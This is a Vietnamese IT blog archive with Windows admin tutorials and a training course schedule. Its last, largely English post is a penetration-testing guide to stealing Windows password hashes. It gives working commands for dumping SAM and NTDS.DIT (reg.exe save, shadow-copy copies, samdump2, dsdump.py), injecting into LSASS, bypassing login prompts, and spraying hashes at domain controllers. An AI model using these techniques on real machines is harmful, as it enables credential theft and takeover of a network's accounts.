Category Archives: Windows 7

Đặt mật khẩu cho thư mục xác định bằng Windows Bit-Locker


Yêu cầu trên ta có thể giải quyết bằng phần mềm dịch vụ Bit-locker được cài trên Windows (chỉ có Windows 7 Untimate và Enterprice trở lên mới hỗ trợ tính năng này…).

Khó khăn đặt ra: Bit-locker là một phần mềm được chạy trên Windows giúp người dùng có thể mã hóa được các ổ đĩa cứng hoặc logic, không xử lý được thư mục “Folders” xác định, do vậy phương án của chúng ta sẽ cho các thư mục “Folders” cần mã hóa vào một số ổ đĩa chung và Dùng Bit-locker để Mã Hóa toàn bộ các ổ đĩa đó, các Bước tiến hành như sau:

Bước 1. Bật tính năng tùy chỉnh ổ đĩa trong Windows lên, chọn nút Start à Chọn mục Run à gõ lệnh: diskmgmt.msc

image

Bước 2. Ta sẽ thấy các tùy chỉnh trong cửa sổ DISK MANAGEMENT

image

Bước 3. Chọn Create VHD :

image

Sau đó ta sẽ tùy chỉnh ổ đĩa ảo lưu trữ, nhấn nút OK khi tùy chỉnh xong.

image

Bước 4. Để ổ đĩa ảo xuất hiện trên Windows 7 như các ổ đĩa khác , bấm chuột phải vào Disk và chọn mục Initialize Diskimage

Hộp thoại tùy chỉnh sẽ mở ra :

image

Bước 5. Tiếp theo ta sẽ Tạo phân vùng trên File VHD, bấm phải chuột chọn Unallocated, Chọn New Simple Volume…

image

Bạn chỉ cần giữ nguyên các tùy chọn mặc định (File system : NTFS, Allocation unit size : Default, Perform a quick format)

image

Bước 6. Sau khi kết thúc quá trình tạo ổ đĩa ảo, chúng ta tiến hành sao chép ‘copy’ các thư mục ‘Folders’ cần được bảo vệ vào trong Ổ đĩa ảo này… đồng thời sử dụng phần mềm Bit-locker để mã hóa mật khẩu giống như Trường Hợp USB ở phần trên, kết quả ta sẽ có ổ đĩa ảo thư mục như sau:

image

Bước 7. Đối với ổ đĩa ảo chúng ta cần thực hiện thao tác ‘Thêm ổ VHD‘ vào Hệ Thống, ta chọn menu Action àAttach VHD.

image

Tiếp theo chúng ta chọn đúng thư mục và tên File VHD đã lưu và bấm nút OK.

image

Bước 8. Các thao tác cài đặt, thiết lập đã hoàn thành, chúng ta cần phải có mật khẩu ‘Password’ để truy cập vào thư mục hay ổ đĩa ảo chứa các Folders, Files quan trọng của chúng ta.

image

Advertisements

Làm thế nào có thể thay đổi tên miền trong tổ chức doanh nghiệp trên Windows Server 2012?


Bài toán đặt ra:

Hệ thống domain của tổ chức Doanh nghiệp thông thường được tạo theo cấu trúc nội bộ, không liên quan tới hệ thống dịch vụ trên Internet. Nhưng vì một số lý do rất cơ bản, tổ chức doanh nghiệp lớn, nằm dải khắp các quốc gia khác nhau.

Khi dùng chung cấu trúc và tên 1 domain,

Ví dụ:  Robusta.org , các đơn vị, tổ chức thành viên sẽ dùng lại đúng domain này cho hệ thống nội bộ tại quốc gia thành viên, đây là cách truyền thống, đơn giản, tiết kiệm thời gian.

Robusta_Org_old

Sau khi xây dựng các hạ tầng mới tài chi nhánh hoặc các tổ chức doanh nghiệp tại các quốc gia thành viên như: Ảo hóa VMware vCenter, Private Cloud…

Các chi nhánh và tổ chức danh nghiệp thành viên sẽ nảy sinh vấn đề mới đó là:

  1. Không thể copy sao chép giống y nguyên domain name của Head quarter do vấn đề conflic về tên miền, quản lý tên miền khi các chi nhánh có nhu cầu Public các dịch vụ Web Portal, Intranet, Private Cloud, Mobile Application cần có chữ ký số thuê của các hãng Cert Sign, Godaddy…
  2. Tên miền quản lý do Head quarter quản lý do vậy, khi đăng ký SSL/TLS sẽ phải do Admin IT của Head quarter control rất mất thời gian hoặc không chủ động điều khiển được từ phía chi nhánh, tổ chức thành viên.
  3. Các chi nhánh, tổ chức thành viên khi có đầu tư hạ tầng thường sẽ có các cơ cấu nhân sự, quản lý tài nguyên chủ động, độc lập thậm chí cấu trúc kỹ thuật CNTT khác đi so với cấu trúc ở trên:

 

Robusta_Org_new

Theo như mô hình trên đây thì chúng ta sẽ:

– Dễ dàng quản lý từng domain name cho các chi nhánh hoặc tổ chức doanh nghiệp thành viên mà không bị phụ thuộc vào việc xét duyệt

đợi điều khiển từ phía Head quarter mỗi lần có phát sinh từ đơn vị chi nhánh.

– Chủ động quản lý các tên miền, máy chủ, máy trạm, tài khoản người dùng, phân nhóm và đặc biệt là các dịch vụ SSL/TLS đăng ký để public intranet/extranet/internet.

 

Các phương án thay đổi:

1. Phương án 1: Xóa Domain tại các chi nhánh hoặc tổ chức Doanh nghiệp thành viên  ( demote AD-DC, sau đó restart và dcpromo lại AD-DC với tên mới)

  • Phương án này đơn giản lặp lại các bước đã làm, mất thời gian làm lại, nhưng có thể sẽ không phù hợp với các máy chủ dịch vụ đã cài và đang vận hành như: UC Voice Lync Conferencing, Exchange Server 2013 on-primise, MS SQL server enterprise, MS SharePoint farm, MS BizTalk Server Enterprise…
  • Do tất cả các máy chủ trên được cài, cấu hình trên nền tảng Windows Authentication, cần Join Domain với tên domain chuẩn ban đầu có sẵn. Nếu hủy domain hiện thời sẽ dẫn tới mất Windows Authentication và WFC Platform cho phép các máy chủ dịch vụ chạy.
  • Phương án này có thể gây sự cố không dùng lại được do các dịch vụ, cấu hình của những ứng dụng phức tạp, ứng dụng đã cấu hình theo tên miền cũ không tương thích, không phù hợp với cấu hình mới.

2. Phương án 2: Thay đổi tên miền (rename domain, sau đó join domain lại ở các máy chủ, máy trạm)

– Phương án này đơn giản trải qua hơn 28 bước thay đổi tên miền và join lại cho các máy trong tên miền của chi nhánh.

– Phương án này sẽ mất thời gian join domain lại các máy chủ dịch vụ, máy trạm với tên miền và tài khoản join domain admin mới.

– Phương án này sẽ không phải cấu hình lại toàn bộ các ứng dụng dịch vụ đang có, chỉ lưu ý các thông số của các trường hợp sau:

1. UC Server sẽ phải kiểm tra lại các tài khoản login dịch vụ theo kiểu UPN@domain và sau đó kiểm tra dịch vụ có dùng account domain\username.

Chứng chỉ CTL sẽ phải xóa bớt chứng chỉ gốc hoặc renew lại chứng thư số mới

2. MS SQL Server enterprise phải cấu hình quyền access login server và có thể cả quyền DB Admin theo dạng Mixed mode (cho phép account SQL Local “sa”) được phép truy cập MS SQL

khi gặp sự cố về Domain Controller hoặc thay đổi Domain name dẫn tới các account của domain name cũ điều khiển được MS SQL Server…

3. MS Exchange server sẽ phải chạy lại Exchange Configuration Wizard để re-buil lại cấu hình domain mới cho Mail Server re-configure

4. MS SharePoint server sẻ phải chạy lại SharePoint Server Configuration Wizard để re-buil Farm Server và một số cấu hình khác.

5. Phải backup các GPO của máy chủ AD-DC trước khi rename domain

 

3. Phương án 3: Không thay đổi tên miền, chỉ thêm các bí danh cho tên miền trên DNS Server (thêm các DNS Zone, bản ghi A (Host), CNAME, PTR, TXT, SRV)

– Phương án này đơn giản trải qua hơn 3 bước thay đổi các thông số tên máy chủ dịch vụ, mapping IP nội bộ các máy của chi nhánh.

– Phương án này sẽ mất ít thời gian kiểm tra máy trạm , máy chủ dịch vụ từ ngoài truy cập và hệ thống nội bộ để xác định các hạng mục có chạy ổn định hay không ?

– Phương án này có thể không phù hợp với toàn bộ hạ tầng ứng dụng của chi nhánh khi có nhiều chuẩn HĐH khác nhau, nhiều chuẩn kết nối dữ liệu người dùng khác nhau, ứng dụng đã fix code gọi LDAP/ADFS…

– Phương án này chỉ phù hợp với hạ tầng đã hoặc đang triển khai Private Cloud, giúp các các web portal intranet, các ứng dụng Windows Form… có thể kết nối và truy cập qua Internet bằng các trình duyệt web HTML5 smartphone, mobile device mà không cần thiết lập VPN kết nối Site – to – site.

 

Tóm lại, phương án 2 là hợp lý nhất.

 

Chi tiết các bước, các bạn nên tham khảo:

Các bước thay đổi tên miềnhttps://mizitechinfo.wordpress.com/2013/06/10/simple-guide-how-to-rename-domain-name-in-windows-server-2012/ 

Tham khảo các ghi chú về kỹ thuật thay đổi tên miền: http://technet.microsoft.com/en-us/library/cc738208(v=ws.10).aspx

Tham khảo support tình huống đăng ký lại chữ ký số mới cho UC: http://support.microsoft.com/kb/2464556/ 

Tham khảo cách đăng ký chữ ký số cho IIS8, IIS8.5:  https://www.digicert.com/ssl-support/ssl-host-headers-iis-8.htm

Tham khảo cách đăng ký chữ ký số cho Exchange 2013: http://exchangeserverpro.com/exchange-server-2013-ssl-certificates/

Thông tin về lịch khai giảng tại Viện đào tạo và quản lý CNTT ROBUSTA Hà nội


Nếu quý khách có yêu cầu chương trình học ngoài lịch khai giảng trên xin vui lòng liên hệ với Robusta

STT

Tên khóa học

Ngày KG

Giờ học

Ngày học

Thời lượng

Học phí

Giảng viên

Các khóa đào tạo công nghệ VMware

1

 Triển khai, quản trị hạ tầng ảo hóa với VMware vSphere 5.5

05-05-2014 18h-21h Thứ 2-6 40 giờ Liên hệ Việt Nam
2
10-05-2014 09h-17h Thứ 7,CN 40 giờ Liên hệ Việt Nam
3
12-05-2014 09h-17h Trong tuần 40 giờ Liên hệ Việt Nam
4

VMware vSphere: Optimize & Scale [v5.1]

26-05-2014 09h-17h Trong tuần

40 giờ

Liên hệ Việt Nam

 

5

Ảo hóa máy trạm và ứng dụng VMware [v5.5]

 

19-05-2014

18h-21h

Trong tuần

40 giờ

Liên hệ

Việt Nam

6

09-06-2014

18h-21h

Thứ 2,4,6

40 giờ

Liên hệ

Việt Nam

 

7

VMware vCenter Configuration Manager for Virtual Infrastructure Management [V5.x]

04-06-2014

09h-17h

Trong tuần

40 giờ

Liên hệ

Nước ngoài

8

VMware vCenter Operations Manager: Analyze and Predict [V5.x]

02-06-2014

09h-17h

Trong tuần

16 giờ

Liên hệ

Nước ngoài

9

VMware vCenter Configuration Manager for Virtual Infrastructure Management [V5.x]

04-06-2014 09h-17h Trong tuần 24 giờ Liên hệ Nước ngoài

Các khóa đào tạo Microsoft

1

Office365 Tổng hợp

 

05-05-2014 09h-17h Trong tuần 24 giờ 06 triệu Việt Nam
2 05-05-2014 18h-21h Thứ 2,4,6 24 giờ 06 triệu Việt Nam
3

 

Manage Projects with Microsoft Project 2010

 

12-05-2014
18h-21h

Thứ 2,4,6

24 giờ 05 triệu Việt Nam
4

Phát triển Biztalk Server dành cho người lập trình

12-05-2014 09-17h

Trong tuần

40 giờ Liên hệ Việt Nam
5

Quản trị Biztalk Server

26-05-2014 09-17h

Trong tuần

40 giờ Liên hệ Việt Nam
6 Phát triển Biztalk trong tích hợp ứng dụng doanh nghiệp 02-06-2014 09-17h Trong tuần 40 giờ Liên hệ Việt Nam
7 02-06-2014 18h-21h Thứ 3,5,7 40 giờ Liên hệ Việt Nam
8 Thiết kế và phát triển Ứng dụng Microsoft Sharepoint 19-05-2014 18h-21h Thứ 2,4,6 40 giờ Liên hệ Việt Nam
9 Thiết kế kiến trúc hạ tầng Microsoft Sharepoint 26-05-2014 09h-17h Trong tuần 40 giờ Liên hệ Việt Nam
10

KHOÁ ĐÀO TẠO NÂNG CAO

ĐIỀU CHỈNH SHAREPOINT 2010 CHO HIỆU SUẤT CAO

23-06-2014 09h-17h Trong tuần 40 giờ Liên hệ Việt Nam
11 Thiết kế các giải pháp BI với  Microsoft SQL Server 09-06-2014 09h-17h Trong tuần 40 giờ Liên hệ Việt Nam
Các khóa đào tạo khác
1 Quản lý CNTT và An toàn thông tin 19-05-2014 09h-17h Trong tuần 40 giờ Liên hệ Việt Nam
2 19-05-2014 18h-21h Thứ 2,4,6 40 giờ Liên hệ Việt Nam
3 IT Management Skills – Các kỹ năng quản lý công nghệ thông tin 16-06-2014 09h- 17h Trong tuần 40 giờ Liên hệ Việt Nam
4 ITIL – Information Technology Infrastructure Library Foundation V3 16-06-2014 18h-21h Thứ 2,4,6
24 giờ Liên hệ Việt Nam
5
Thiết kế Website PHP và HTML5 bằng phương pháp sản xuất công nghiệp
27-4-2014
08h-12h
Chủ nhật
4 giờ
01 triệu
Việt Nam

 

Thông tin ưu đãi:

– Giảm giá đặc biệt cho các học viên đăng ký và thanh toán trước ngày khai giảng tối thiểu 02 tuần hoặc đăng ký nhóm 02 người trở lên.

 

Thông tin chi tiết vui lòng liên hệ:

Lê Trường Sơn (Mr.) – Mobile : (+84) 0904 411 933 – Email: son.le@robusta.vn

Lê Toàn Thắng (Mr.) – Mobile : (+84) 943 851 178 – Email: thang.le@robusta.vn

Xin cám ơn và mong được hợp tác và hỗ trợ Quý Anh/Chị cùng đơn vị trong thời gian tới!

Cách tạo các ứng dụng chạy trên nền windows Service


Trên máy chủ windows NT, Windows Server 2000, Windows Server 2003, 2008 2012 đều cung cấp các bộ phần mềm xử lý các dịch vụ hệ thống Windows Resource kit.

Nhu cầu đặt ra với người lập trình hoặc quản trị là :

”Làm sao để có thể đưa các phần mềm đó chạy trên máy chủ windows theo phương thức Host service, khi windows server khởi động lên thì các ứng dụng này cũng sẽ được khởi động / dừng theo tiến trình xử lý của windows server tự động ?”

Bước 1.

Tìm đến bộ lệnh của windows resource kit trong c:\windows\SysWOW64     sẽ thấy file sc.exe (dùng để khai báo dịch vụ chạy trên nền windows 64bit).

image

Bước 2. Gõ lệnh trong màn hình CMD “run as Administrator” theo cấu trúc sau:

SC.exe “Tên của Service” start=auto binpath=”địa chỉ thư mục và tên file chạy dịch vụ”

ví dụ: c:\windows\syswow64\sc.exe create “RobustaCRM Testing System” start= auto binpath= ”c:\CRM\RobustaCRM_ Test\mainservice.exe”

image

Bước 3. Sau khi chạy lệnh SC trên, bạn cần kiểm tra trên Administrator Tools> Service

image

Bước 4. Tạo đăng ký trên Windows Registry Editor Version,

Mở chạy Run và gõ lệnh: Register

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RobustaCRM Testing\Paramaters]

“Application”=”c:\\CRM\\RobustaCRM_Test\\mainservice.exe”

 

Chúc các bạn thành công !

USB được chỉ định truy cập trên máy tính Windows 7/8.x


1. Phương án 1:

Thay vì quy định cho ổ USB chỉ định được truy cập vào cổng USB trên máy PC, ta có thể tùy chỉnh cho những User nào có quyền mới được truy cập vào cổng USB, các bước tiến hành như sau:

Bước 1: Start Window Expoler và tìm kiếm như sau:”%SystemRoot%Inf

image

Bước 2: Tìm đến thư mục Usbtor.PNF và chuột phải vào file chọn Properties:

image

Bước 3: Thẻ tùy chỉnh được mở ra, chọn Tab sercurity

image

Chú ý: ta cũng có thể cho tài khoản thuộc hệ thống AD Domain/LDAP vào danh sách Deny Permission

Bước 4: Đối với file Usbtor.INF ta cũng sẽ làm tương tự:

image

Bước 5. Kiểm tra sau khi đặt lại quyền cho các users và groups trong 2 files nói trên, ta có thể tùy chỉnh cho những User và Group được chỉ định mới có thể truy cập vào cổng USB.

2. Phương Án 2: sử dụng Bit-locker

Bước 1. Ta cắm USB vào cổng USB của máy tính, bấm chuột phải vào ổ USB cần mã hóa chọn Turn on bitlocker.

image

Bước 2. Hộp thoại mã hóa Bitlocker sẽ mở ra, có 2 các thức để mở khóa ổ đĩa (khi đã bị mã hóa, cách 1. Dùng mật khẩu, cách 2. Dùng TPM card)

image

Nhằm đáp ứng yêu cầu ta sẽ chọn cách dùng mật khẩu,Ta sẽ nhập Mật khẩu vào bên dưới (mật khẩu để mở các thư mục sau khi đã mã hóa…..)

Bước 3. Sau khi thiết lập mật khẩu bạn sẽ được cung cấp 1 file khóa “cứng” khôi phục mật khẩu khi bị mất hoặc quên mật khẩu…

image

Bước 4. Tiếp theo bạn bấm next để bắt đầu mã hóa ổ đĩa:image

Sau khi quá trình kết thúc một hộp thoại thông báo hoàn thành sẽ được mở ra:

image

Lưu ý: Kích thước để mã hóa và có mật khẩu tối thiểu 64Mb và không lên lớn quá 64Gb vì sẽ mất thời gian lâu để giải mã khi cần truy cập.

Bước 5. Sau khi hoàn thành ta sẽ có USB được Cài mật khẩu:

image

Khi mở sẽ yêu cầu mật khẩu:Chú ý mỗi lần cắm USB sẽ bị yêu cầu nhập Password để mở.

image

Làm Thế nào để ẩn máy tính của mình trên mạng LAN


Máy tính của tôi có tên: ThinApp, mục đích để ẩn nó trong Network Icon ta sẽ làm theo những thao tác sau:
image
Bước 1: Chọn nút Start,chọn run search: “service”.

image

Bước 2: chọn mục dịch vụ “Function Discovery Resource Publication”:

image
Bước 3. Tiếp đến ta sẽ tùy chỉnh “Disabled” như sau:

image

Bước 4. Kiểm tra màn hình kết quả:

image

Làm thế nào để đồng bộ Active Directory Sync trong khi Username và Password bị mã hoá theo OS 32/64bit ? (tiếp theo)


Phần 1: tìm hiểu về các cơ chế lưu hash password trên OS

Windows Security Account Manager
Slightly modified definition from Wikipedia:

The Security Accounts Manager (SAM) is a registry file in Windows NT and later versions until the most recent Windows 7. It stores users’ passwords in a hashed format (in LM hash and NTLM hash). Since a hash function is one-way, this provides some measure of security for the storage of the passwords.

Generally, dumping operating system users’ password hashes is a common action following a compromise of a machine: getting access to the password hashes might open the doors to a variety of attacks including, but not limited to, authenticate with the hash over SMB to other systems where passwords are reused, password policy analysis and pattern recognition, password cracking, etc.

Depending on the type of access that you have got to the target, you can retrieve the password hashes from SAM in different ways.

Physical access

Given physical access to the system, typically during a laptop assessment or a successful social engineering engagement, the preferred way to safely dump the password hashes is to power off the machine, enter the BIOS menu at power-on time, review the boot order to allow boot from the optical drive and USB drive before local hard-disk, save the settings and reboot the system with your favourite GNU/Linux live distribution CD or USB stick. Two widely known tools to dump the local users’ hashes from the SAM file, given the Windows file system block file, are bkhive and samdump2:

  • bkhive – dumps the syskey bootkey from a Windows system hive.
  • samdump2 – dumps Windows 2k/NT/XP/Vista password hashes.

These tools are generally included in many GNU/Linux live distributions. If they’re not, make sure to bring a copy of them with you.

Usage:

# bkhive
bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Usage:
bkhive systemhive keyfile

# samdump2
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Usage:
samdump2 samhive keyfile

Example of retrieving the SAM hashes from a Windows partition /dev/sda1:

# mkdir -p /mnt/sda1
# mount /dev/sda1 /mnt/sda1
# bkhive /mnt/sda1/Windows/System32/config/SYSTEM /tmp/saved-syskey.txt
# samdump2 /mnt/sda1/Windows/System32/config/SAM /tmp/saved-syskey.txt > /tmp/hashes.txt

In the event that you have not got bkhive or samdump2 with you, you can fall-back to copy the SYSTEM and SAM files from /mnt/sda1/Windows/System32/config to your USB stick and import them to any tool that is able to extract the SAM hashes from them: Cain & Abel, creddump and mimikatz are some available tools.

Bypass login prompt

If you are looking into bypassing the login prompt rather than dumping users’ password hashes, some smart people have came up with innovative approaches:

  • BootRoot is a project presented at Black Hat USA 2005 by researchers Derek Soeder and Ryan Permeh, as an exploration of technology that custom boot sector code can use to subvert the Windows kernel as it loads. The eEye BootRootKit is a boot sector-based NDIS backdoor that demonstrates the implementation of this technology.
  • SysRQ2 is a bootable CD image that allows a user to open a fully privileged (SYSTEM) command prompt on Windows 2000, Windows XP, and Windows Server 2003 systems by pressing Ctrl+Shift+SysRq at any time after startup. It was first demonstrated at Black Hat USA 2005 by researchers Derek Soeder and Ryan Permeh as an example of applied eEye BootRoot technology. Use the “create CD from ISO image” feature of your preferred CD burning software to create a bootable SysRq CD.
  • Kon-Boot is an prototype piece of software which allows to change contents of a linux kernel and Windows kernel on the fly (while booting). In the current compilation state it allows to log into a linux system as root user without typing the correct password or to elevate privileges from current user to root. For Windows systems it allows to enter any password protected profile without any knowledge of the password.

Password reset

Alternatively you can boot the machine with the bootdisk live CD or USB stick and use the chntpw utility to reset any Windows local user’s credentials.

Post-exploitation scenario

The typical scenario here is that you have compromised a Windows machine by any means and have got shell access as an administrative user. Firstly, you need to escalate your privileges to SYSTEM user. A simple way is to use Sysinternals’ PsExec utility:

C:\>psexec.exe -i -s cmd.exe

Although, there are several other techniques too, but this is outside of the scope of this post.

Legacy techniques

On Windows NT and Windows 2000 systems you can use Ntbackup utility part of the MS-DOS subsystem: Backup the system state into a file locally on the machine you have compromised, then using Ntbackup again, restore the system state stuff to a local directory without preserving the security. Once complete, you will have the SAM and SYSTEM files. You need about 280Mb for the initial backup – typical for a Windows 2000 with current service packs and hot fixes.
On modern releases of Windows, you can use Wbadmin, an alternative to Ntbackup.

Another solution is to use regback.exe part of the Windows 2000 Resource Kit Tools. This is slightly easier as it only dumps the specific files:

C:\>regback.exe C:\backtemp\SAM machine sam
C:\>regback.exe C:\backtemp\SYSTEM machine system

If you cannot get regback.exe to work, on Windows XP and above systems use regedit.exe or reg.exe. Using reg.exe:

C:\>reg.exe save HKLM\SAM sam
The operation completed successfully
C:\>reg.exe save HKLM\SYSTEM sys
The operation completed successfully

Using regedit.exe:

  • Execute regedit.exe from Start / Run prompt.
  • Open up Computer\HKEY_LOCAL_MACHINE and right-click the SAM section and select Export.
  • Change the Save as type setting to Registry Hive Files and save as SAM.
  • Same steps with SYSTEM hive.

Lastly, you can also get the SAM and SYSTEM files from C:\Windows\repair\. Although this directory contains outdated copies of the original C:\Windows\System32\config\ files so it might not reflect the current users’ credentials.

Volume Shadow Copies technique

This technique is fairly recent and was first illustrated by Tim Tomes. It consists of abusing the Volume Shadow Copies functionality in modern Windows operating systems to access locked system files like C:\Windows\System32\config’s SAM and SYSTEM and others.

You can use the Volume Shadow Copy Management command line interface, vssown, to leverage this technique as follows.

List shadow copies:

C:\>cscript vssown.vbs /list
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

SHADOW COPIES
=============

As expected, no shadow copies initially.

Verify the status of the Volume Shadow Service (VSS):

C:\>cscript vssown.vbs /status
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

[*] Stopped

C:\>cscript vssown.vbs /mode
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

[*] VSS service set to ‘Manual’ start mode.

In this case, once we are done, we need to restore it to the initial state (Stopped).

Create a new shadow copy:

C:\>cscript vssown.vbs /create
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

[*] Attempting to create a shadow copy.

Verify that the shadow copy has been created:

C:\>cscript vssown.vbs /list
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

SHADOW COPIES
=============

[*] ID: {D79A4E73-CCAB-4151-B726-55F6C5C3A853}
[*] Client accessible: True
[*] Count: 1
[*] Device object: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
[*] Differnetial: True
[*] Exposed locally: False
[*] Exposed name:
[*] Exposed remotely: False
[*] Hardware assisted: False
[*] Imported: False
[*] No auto release: True
[*] Not surfaced: False
[*] No writers: True
[*] Originating machine: LAPTOP
[*] Persistent: True
[*] Plex: False
[*] Provider ID: {B5946137-7B9F-4925-AF80-51ABD60B20D5}
[*] Service machine: LAPTOP
[*] Set ID: {018D7854-5A28-42AE-8B10-99138C37112F}
[*] State: 12
[*] Transportable: False
[*] Volume name: \\?\Volume{46f5ef63-8cca-11e0-88ac-806e6f6e6963}\

You need to take note of the Device object value for the next step and the ID for the cleanup step.

Pull the following files from a shadow copy:

C:\>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM .C:\>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM .

You have just copied over SAM and SYSTEM files from the shadow copy to the C:\ root folder.

Cleanup:

C:\>cscript vssown.vbs /delete {D79A4E73-CCAB-4151-B726-55F6C5C3A853}

Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

[*] Attempting to delete shadow copy with ID: {D79A4E73-CCAB-4151-B726-55F6C5C3A853}

Eventually, restore to original Stop status:

C:\>cscript vssown.vbs /stop

Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

[*] Signal sent to stop the VSS service.

In-memory technique

The concept behind in-memory dump of SAM hashes it to inject a DLL into the LSASS system process or, generally speaking, parsing the memory for specific patterns and inspect these memory pages’ content. The former action can lead to a Blue Screen of Death (BSoD) condition following a crash of the LSASS process therefore this action is not recommended on production environments: prefer registry hive copy (regback.exe and reg.exe/regedit.exe) and Volume Shadow Copies techniques instead. Nevertheless, in some specific instances, the in-memory technique is required.

The most widely known standalone tool to dump SAM hashes is probably fgdump, the successor of pwdump6, both tools developed by the foofus team. The main advantage of fgdump over pwdump6 is that it works on Windows Vista and later versions. Although, I have seen them both failing under some circumstances. More reliable tools include pwdump7 from Andres Tarasco and the gsecdump from TrueSec. Both work on 32-bit and 64-bit systems across all versions of Windows. Although, the former cannot successfully dump users’ password hashes on domain controllers as it reads the SAM hashes from the registry rather than injecting into LSASS process. Despite not working on 64-bit systems, another popular and reliable tool is PWDumpX by Reed Arvin.

The following screen-shot shows the dump of SAM users with gsecdump on a Windows Server 2003 SP2 32-bit:

Dump of local users with gsecdump by code injection into the LSASS process

The Metasploit Framework also has its own post-exploitation modules, Meterpreter built-in command and dated Meterpreter script to dump the SAM hashes. Details on how these pieces of code work within the framework and which techniques they implement can be found on these blog posts by HD Moore.

Needless to say that there are more options and knowledge of which one to use within the target environment is important. In order to facilitate this task, I have listed the relevant tools, their capabilities, where they do work and, most importantly, where they are known to fail on this spread-sheet.

 

Phần 2: Tổng kết vấn đề lưu hash password

Conclusions on Windows Security Account Manager
In the previous post of this series, I briefly explained what the Windows Security Account Manager (SAM) is, how to dump Windows local users’ password hashes from SAM having physical access to the target system or following a remote compromise of the machine, post-exploitation.
Remotely, there exist three possible techniques: legacy, volume shadow copies and in-memory dump. Lastly, I highlighted the most widely used tools for the in-memory hashes dump and I collected and released them in this spread-sheet along with other tools that I will discuss later.
I want to reiterate the following concept: given file transfer ability between your machine and the target system, always prefer to copy the SAM and SECURITY files over from the target and extract the password hashes offline afterwards.
Although, this safe approach to password hashes dump does not guarantee that you are going to obtain all Windows local accounts’ hashes. If you suspect that this is case, you will have to dump the hashes via in-memory dump and merge the results. Odd, but I have seen this happening quite a few times already and I am still discussing standalone Windows workstations, not part of a Windows domain.
Preferred tools
Personally, my first choice for standalone SAM hashes dump is pwdump7: it works on all Windows version from 2000 on both 32-bit and 64-bit systems. However, this tool does not perform an in-memory dump and could miss out hashes. I always run gsecdump along with pwdump7 to cover both techniques across all Windows versions and architecture and carefully launched once at a time do crash the LSASS process.
When I have got a Metasploit Meterpreter shell onto the system, I rely on the post-exploitation module smart_hashdump by Carlos Perez, falling back to its predecessor post-exploitation module hashdump when it fails.
Active Directory
Definition from Wikipedia:

Active Directory serves as a central location for network administration and security. It is responsible for authenticating and authorizing all users and computers within a network of Windows domain type, assigning and enforcing security policies for all computers in a network […] when a user logs into a computer that is part of a Windows domain, it is Active Directory that verifies his or her password […]

This definition comes into play when you have compromised a system part of a Windows domain. In order to quickly extend your control over the whole domain, the goal is to compromise the root domain controller. If you are within a child domain, the final goal is to achieve Enterprise Domain Administrator level access onto the root domain controller of the Windows forest’s parent domain. There are plenty of resources on the Internet discussing domain escalation and this is out of the scope of this post series. A blog post that summarizes the best techniques and goes straight to the point is written by pentestmonkey.net. Alternatively, you can pass the local users’ hashes obtained from your entry point machines to keimpx and spray them against the domain controllers: if the system administrator reuses the same local Administrator password across all machines, you are in!
Regardless of how you have compromised a domain controller, preferably the root domain controller as it is the first to get updated with changes to user accounts, the important is that you have got an administrator (local or domain) shell onto it.
Database file NTDS.DIT
The goal now is to dump the domain users’ password hashes. These are stored, along with nearly all the information that is accessible in the Active Directory (user objects, groups, membership information, etc), in a binary file, %SystemRoot%\ntds\NTDS.DIT.
This file is locked by the system. You can use the volume shadow copies technique illustrated in the previous post to copy it along with the SYSTEM file over to your machine.
Alternatively, use the ntdsutil snapshot facility introduced in Windows Server 2008. It will create a snapshot of the active directory database allowing you to copy ntds.dit and SYSTEM file. This technique is detailed on a Microsoft TechNet article.
Extract hashes from NTDS.DIT
You can use the passcape’s Windows Password Recovery tool to extract hashes from ntds.dit.
Alternatively, you can use a couple of tools (ntds_dump_hash.zip) developed by Csaba Barta and documented in his paper titled Research paper about offline hash dump and forensic analysis of ntds.dit. These tools are used to:

  • Extract the required data from ntds.dit: esedbdumphash.
  • Decrypt the hashes and interpreting other information regarding the user account: dsdump.py, dsdumphistory.py, dsuserinfo.py.

Download and compile the tool:

$ wget http://csababarta.com/downloads/ntds_dump_hash.zip
$ unzip ntds_dump_hash.zip
$ cd libesedb
$ ./configure && make

Use esedbdumphash to extract the datatable from ntds.dit:

$ cd esedbtools
$ ./esedbdumphash -v -t /tmp/output <ntds.dit file>
$ ls -1 /tmp/output.export/
datatable

Use dsdump.py to dump the hashes from the datatable file using the bootkey (SYSKEY) from the SYSTEM hive:

$ cd ../../creddump/
$ chmod +x *.py
$ ./dsuserinfo.py /tmp/output.export/datatable
$ ./dsdump.py <SYSTEM file> /tmp/output.export/datatable –include-locked –include-disabled > domain_hashes.txt

Like standalone machines, you can use the in-memory technique too to dump the domain users’ hashes. The tools are the same and work equally. Just be cautious when injecting into the LSASS process of a domain controller: in the worst case scenario, you will have to reboot an infrastructure-critical server.
I have added these tools and improved the spread-sheet.
Updates on January 4, 2012
During December 2011, Csaba Barta has dug some more into NTDS.dit structure and as a result he has developed a new framework called NTDSXtract to extract information from database tables extracted with libesedb from ntds.dit file: both tools now support 64-bit derived database files too.

Download and install the latest release of libesedb.

Extract the database tables from ntds.dit:

$ esedbexport -l /tmp/esedbexport.log -t /tmp/ntds.dit <ntds.dit file>
esedbexport 20111210

Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
